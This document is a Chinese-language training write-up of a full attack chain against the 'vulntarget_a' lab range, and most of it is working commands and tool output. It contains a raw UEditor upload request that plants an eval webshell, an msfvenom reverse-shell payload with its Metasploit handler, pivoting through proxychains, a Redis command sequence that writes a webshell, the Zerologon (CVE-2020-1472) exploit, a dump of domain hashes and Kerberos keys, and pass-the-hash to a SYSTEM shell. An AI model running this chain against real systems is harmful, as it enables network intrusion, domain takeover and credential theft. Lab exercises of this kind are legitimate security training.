vulntarget_a 訓練筆記

win 7 權限

利用任意文件上傳 getshell

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.159.129
Content-Length: 882------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileFieldName]"filename
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"10000
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[filePathFormat]"R4g1729585588321
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]".php
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="mufile"submit
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="filename"; filename="R4g1729585588321.php"R4g1729585588321<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['cmd']);?>
------WebKitFormBoundarymVk33liI64J7GQaK--

當然工具直接梭哈也行

?win 2016 權限

將 win7 上線 cs 備用

cs木馬生成

設置監聽器

生成 exe 的木馬

用蟻劍傳輸后運行即可上線

redis 未授權 getshell

MSF上線

生成反向馬

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 -f exe > /root/555.exe

通過蟻劍上傳執行，msf 監聽

┌──(root?kali)-[~]
└─# msfconsole msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.159.128
lhost => 192.168.159.128
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Sending stage (176198 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.129:56385) at 2024-10-23 20:11:15 +0800meterpreter > ls
Listing: C:\tmp
===============Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2024-10-23 20:06:58 +0800  555.exemeterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) >

添加路由，設置代理，arp獲取到內網同網段IP

msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroutemsf6 post(multi/manage/autoroute) > set session 1
session => 1msf6 post(multi/manage/autoroute) > run
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completedmsf6 post(multi/manage/autoroute) > optionsModule options (post/multi/manage/autoroute):Name     Current Setting  Required  Description----     ---------------  --------  -----------CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"SESSION  1                yes       The session to run this module onSUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)View the full module info with the info, or info -d command.msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > optionsModule options (auxiliary/server/socks_proxy):Name     Current Setting  Required  Description----     ---------------  --------  -----------SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or0.0.0.0 to listen on all addresses.SRVPORT  1080             yes       The port to listen onVERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)When VERSION is 5:Name      Current Setting  Required  Description----      ---------------  --------  -----------PASSWORD                   no        Proxy password for SOCKS5 listenerUSERNAME                   no        Proxy username for SOCKS5 listenerAuxiliary action:Name   Description----   -----------Proxy  Run a SOCKS proxy serverView the full module info with the info, or info -d command.msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy servermsf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...meterpreter > arp aARP cache
=========IP address       MAC address        Interface----------       -----------        ---------10.0.20.1        00:50:56:c0:00:0b  Intel(R) PRO/1000 MT Network Connection #210.0.20.99       00:0c:29:49:db:32  Intel(R) PRO/1000 MT Network Connection #210.0.20.254      00:50:56:f2:92:e5  Intel(R) PRO/1000 MT Network Connection #210.0.20.255      ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2192.168.159.1    00:50:56:c0:00:08  Intel(R) PRO/1000 MT Network Connection192.168.159.2    00:50:56:f4:36:2d  Intel(R) PRO/1000 MT Network Connection192.168.159.128  00:0c:29:cc:f9:72  Intel(R) PRO/1000 MT Network Connection192.168.159.254  00:50:56:fe:c6:0b  Intel(R) PRO/1000 MT Network Connection192.168.159.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection224.0.0.22       00:00:00:00:00:00  Software Loopback Interface 1224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection #2224.0.0.22       01:00:5e:00:00:16  Bluetooth ����(����������)224.0.0.252      00:00:00:00:00:00  Software Loopback Interface 1224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection #2239.255.255.250  00:00:00:00:00:00  Software Loopback Interface 1239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection239.255.255.250  01:00:5e:7f:ff:fa  Intel(R) PRO/1000 MT Network Connection #2255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection255.255.255.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2255.255.255.255  ff:ff:ff:ff:ff:ff  Bluetooth ����(����������)

更改配置

vi  /etc/proxychains4.conf

代理之后，可以直接 redis 未授權訪問

利用redis未授權以及php web環境來getshell

redis未授權漏洞寫webshell

┌──(root?kali)-[~]
└─# proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>

寫好shell之后，蟻劍設置代理連接

cs上線

右鍵 win7 選擇轉發上線

如圖選擇 payload 生成

設置完后會自動創建監聽器，并自動開啟監聽

win2019 權限獲取

msf 正向代理

通過代理啟動 msf,注意只有通過代理（proxychains msfconsole）才能使流量正向到內網win2016上

┌──(root?kali)-[/zbug]
└─# proxychains msfconsole[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: After running db_nmap, be sure to check out the result 
of hosts and services
[proxychains] DLL init: proxychains-ng 4.17le.../                                               
[proxychains] DLL init: proxychains-ng 4.17msf6 > use exploit/multi/handler
[proxychains] DLL init: proxychains-ng 4.17
[*] Using configured payload generic/shell_reverse_tcp
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17
payload => windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set lport 4444
[proxychains] DLL init: proxychains-ng 4.17
lport => 4444
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set rhost 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
rhost => 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Started bind TCP handler against 10.0.20.99:4444
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:4444 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.0.20.99:4444  ...  OK
[*] Sending stage (201798 bytes) to 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (127.0.0.1:59614 -> 127.0.0.1:1080) at 2025-03-09 15:30:20 +0800
[proxychains] DLL init: proxychains-ng 4.17meterpreter >

通過蟻劍運行即可

添加路由鏈

meterpreter >  run post/multi/manage/autoroute
[proxychains] DLL init: proxychains-ng 4.17[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[proxychains] DLL init: proxychains-ng 4.17meterpreter > run post/windows/gather/enum_domain
[proxychains] DLL init: proxychains-ng 4.17
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
[proxychains] DLL init: proxychains-ng 4.17meterpreter > bg
[proxychains] DLL init: proxychains-ng 4.17
[*] Backgrounding session 1...
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > set version 5
[proxychains] DLL init: proxychains-ng 4.17
version => 5
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > set srvport 1081
[proxychains] DLL init: proxychains-ng 4.17
srvport => 1081
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > options
[proxychains] DLL init: proxychains-ng 4.17Module options (auxiliary/server/socks_proxy):Name     Current Setting  Required  Description----     ---------------  --------  -----------SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT  1081             yes       The port to listen onVERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)When VERSION is 5:Name      Current Setting  Required  Description----      ---------------  --------  -----------PASSWORD                   no        Proxy password for SOCKS5 listenerUSERNAME                   no        Proxy username for SOCKS5 listenerAuxiliary action:Name   Description----   -----------Proxy  Run a SOCKS proxy serverView the full module info with the info, or info -d command.[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Auxiliary module running as background job 0.
[proxychains] DLL init: proxychains-ng 4.17[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >

這里配置完之后繼續配置代理文件

vi  /etc/proxychains4.conf

使用 nmap 測試是否連接成功

┌──(root?kali)-[/zbug]
└─# proxychains nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 18:56 CST
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:139  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:8080 <--socket error or timeout!
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:80 <--socket error or timeout!
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:6379 <--socket error or timeout!
Nmap scan report for 10.0.10.110
Host is up (0.14s latency).PORT     STATE  SERVICE
80/tcp   closed http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
6379/tcp closed redis
8080/tcp closed http-proxyNmap done: 1 IP address (1 host up) scanned in 45.37 seconds

CVE-2020-1472利用

git clone https://github.com/dirkjanm/CVE-2020-1472.git
git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && pip3 install .

下載完成后,利用用 cve-2020-1472 漏洞將域控密碼置空

┌──(root?kali)-[/zbug/CVE-2020-1472]
└─# proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110 [proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:49670  ...  OK
=========================================================================================================================
Target vulnerable, changing account password to empty stringResult: 0Exploit complete!

使用 secretsdump.py? 嘗試獲取 administrator 域控的 hash 值,此文件在 impacket/examples 目錄下

┌──(root?kali)-[/zbug/impacket/examples]
└─# proxychains4 python3 secretsdump.py  vulntarget.com/WIN2019\$@10.0.10.110  -just-dc  -no-pass[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:135  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:49667  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:9630d035ba860e59ca7a51ea39a48e97:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:9173b992970cde4cf92795ea2f57c82fc72752e261eb3f6db7fd385500da709a
WIN2016$:aes128-cts-hmac-sha1-96:2fdb26ae937ab6b24e0931ac928ab960
WIN2016$:des-cbc-md5:8cce51314fb95761
[*] Cleaning up...

成功獲取

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

相同目錄下使用 smbexec.py? 拿域控shell

┌──(root?kali)-[/zbug/impacket/examples]
└─# proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain  ...  0.0.0.0:1080  ...  0.0.0.0:1081  ...  10.0.10.110:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system